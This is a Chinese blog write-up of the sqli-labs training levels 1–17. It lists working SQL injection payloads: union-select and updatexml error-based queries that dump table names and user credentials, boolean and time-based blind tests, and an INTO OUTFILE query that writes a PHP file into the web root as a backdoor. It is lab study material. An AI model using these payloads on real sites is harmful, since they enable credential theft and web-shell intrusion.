sqli-labs部分关思路-CSDN博客

本文链接：https://blog.csdn.net/vt_yjx/article/details/132747148

问题：你了解sql注入吗

答：由于程序过滤不严谨，用户异常输入，这些输入会导致数据库异常查询，最终导致sql注入

mysql三种注释符：

--+

/**/

updatexml

updatexml()

UPDATEXML (XML_document, XPath_string, new_value);

这个函数作用是替换数据，三个参数对应的分别是源文档、要查找的元素路径、新的值

例子：

UPDATE mytable SET xml_data = updatexml(xml_data, '/path/to/element', 'new_value') WHERE ...

一个名为"mytable"的表，其中包含一个名为"xml_data"的XML类型列。要将XML文档中"path/to/element"元素的值替换为"new_value

报错注入利用：

0x7e是~的十六进制，会让xpath参数报错，然后返回报错信息，同时在xpath参数中插入concat()连接字符串，和所要查询的内容，例如database()

即可将查询内容与报错信息一起反馈出来。

1

1.判断注入类型：先单引号发现报错，说明是单引号注入

2.判断字段数：用order by ,经测试：?id=1' order by 4 --+发生报错，说明只有3个字段

3.查看回显位置：用一个不存在id测试回显位置：?id=-1' union select 1,2,3 --+，发现，2,3是回显位置

4.查数据：

库名: ?id=-1' union select 1,database(), 3--+，得到security

表名: ?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+,得到四张表：

emails,referers,uagents,users

字段名：就是将表名的table改成columns，得到表名，太多了就不列举了

发现两个关键的username,password

查字段内容：?id=-1' union select 1,group_concat(username),3 from security.users--+，查哪个字段就把username改成对应字段名即可

最终得到账号密码

2

1.判断注入类型：单双引号都报错了，引号闭合不了，不是字符注入。是数字注入

2.用order by 判断字段数为3

3.用union判断回显位置为2,3

4.查数据：

库名：?id=-1%20union%20select%201,database(),--+，得到security

表名：?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

字段名：把表名的table和tables改成column和columns

查账号密码：?id=-1 union select 1,group_concat(username),3 from security.users--+

3

1.判断注入类型，测试了1和双引号没异常，单引号发现报错，说有括号，所以再闭合一个括号 id=1')

2.判断字段和回显分别是3和2,3

3.查数据跟前面一样

4

从3的单引号变成双引号，其他不变

5

1.判断注入类型，发现只有id=1'能报错

2.测试字段数和回显发现无法使用联合查询了，使用报错注入

3.查数据：

库名：?id=-1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+

表名：?id=-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

字段名：?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security'),0x7e),1)--+

用户密码：

?id=-1' and updatexml(1,concat(0x7e,(select group_concat(username) from security.users),0x7e),1)--+ ?id=-1' and updatexml(1,concat(0x7e,(select group_concat(password) from security.users),0x7e),1)--+

6

只是把单引号换成了双引号，其他和5关一样

7

这关很奇怪，要做出来得去改mysql的配置文件，允许上传文件，然后直接传后门，但是都能修改文件了，还有必要改ini吗

但是不妨也是一种手段：

利用前提：1.是root，2.目录是网站的根路径，也就是网站能访问到该路径

先修改my.ini的secure_file_priv="要上传文件的路径"

然后闭合后写导出语句

?id=1')) union select 1,2,'<?php phpinfo(); ?>' into outfile "D:\phpstudy_pro\WWW\shellaa.php"--+

然后就把我们的shellaaa.php上传到这个目录下了，可以传一句话后门直接用蚁剑登录，我这里测试用的是phpinfo();

8

判断注入类型：初步判断为bool盲注

库名：

库名的长度：?id=1' and length(database())>8 --+数字加到8没有回显，说明库名长度为8。库名：?id=1' and ascii(substr((database()),1,1))=115 --+当等于115的时候有回显，说明库名的第一个字符为s，以此类推

表名、字段名类似，盲注比较麻烦，建议用脚本或者sqlmap

9

判断注入类型：测试对错都不变，是时间盲注

跟布尔盲注的区别就在于加了一个sleep()函数

?id=1; and if(ascii(substr(database(),1,1))>100,sleep(2),0)--+

如果条件为真就会延迟两秒回显，也可以看网页检查的network模块的加载时间的变化，我们以此来判断是否为真，其余思路与布尔盲注一样

10

和第9关的注入唯一区别就是不用闭合了

11

用户名输入单引号报错，用updatexml尝试报错注入

直接在用户名测试：aaa' and updatexml(1,concat(0x7e,(select user()),0x7e),1)# 这里因为是post提交，所以注释用的#

然后成功回显库名了，然后用户输入admin,密码输入-1' union select 1,2#

看到回显位置，然后就直接查数据即可

12

跟11题区别就是密码框输入的时候用双引号闭合：-1' union select 1,2#

13

改动：单引号+括号闭合，其他跟11一样

14

双引号闭合的，正常回显被注释，不能用联合查询，首选用updatexml报错注入、也可以bool盲注根据返回的图片来判断

15

从14的双引号闭合变成了单引号闭合，其他一样

16

又变成了双引号+括号

17

先判断魔术开关（只在php低版本有），然后用一个stripslashes()，作用是去掉转义符

再判断是否为数字，然后用mysql_real_escape_string()（也是个低版本的函数）对特殊字符转义，例如单双引号

解释：如果不判断魔术开关，会自动转义一次，然后到了mysql_real_escape_string()这个函数又转义一次，这样双重转义等于没有转义，单引号就逃出限制了，开着的话就会只转义一次，单引号就被转义失效了

用户名是admin

密码先测试一下单引号闭合，报错了

那么尝试报错注入成功回显：payload：123456' and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x7e),1)#

注意单引号前面的密码要符合规范，例如我只写了个aaa就会报错不合法